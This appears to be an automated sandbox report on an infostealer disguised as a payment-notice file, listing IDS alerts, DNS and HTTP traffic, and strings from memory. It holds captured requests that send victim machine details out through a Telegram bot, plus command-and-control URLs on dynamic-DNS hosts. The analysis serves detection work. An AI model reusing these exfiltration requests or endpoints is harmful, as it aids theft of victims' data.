Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49719 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49708 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49735 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49728 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49732 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49730 -> 188.114.96.3:443

Source: unknown

FTP traffic detected: 119.18.54.39:21 -> 192.168.2.7:49737 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 150 allowed.220-Local time is now 12:46. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 150 allowed.220-Local time is now 12:46. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 150 allowed.220-Local time is now 12:46. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49706 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49727 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2003/10/2024%20/%2015:39:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2003/10/2024%20/%2021:14:30%0D%0ACountry%20Name:%20%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: awaratrendz.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 03 Oct 2024 07:16:42 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 03 Oct 2024 07:16:59 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3760065848.0000000000434000.00000040.00000400.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3760065848.0000000000434000.00000040.00000400.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://awaratrendz.com
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1360405295.0000000002EE2000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1451353095.0000000002B12000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3760065848.0000000000434000.00000040.00000400.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3760065848.0000000000436000.00000040.00000400.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20a
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SOFcFE.exe, 00000014.00000002.3763196888.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: SOFcFE.exe, 00000014.00000002.3763196888.0000000002E08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002E08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3768802271.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3768922904.000000000409D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SOFcFE.exe, 00000014.00000002.3763196888.0000000002F54000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002DE3000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
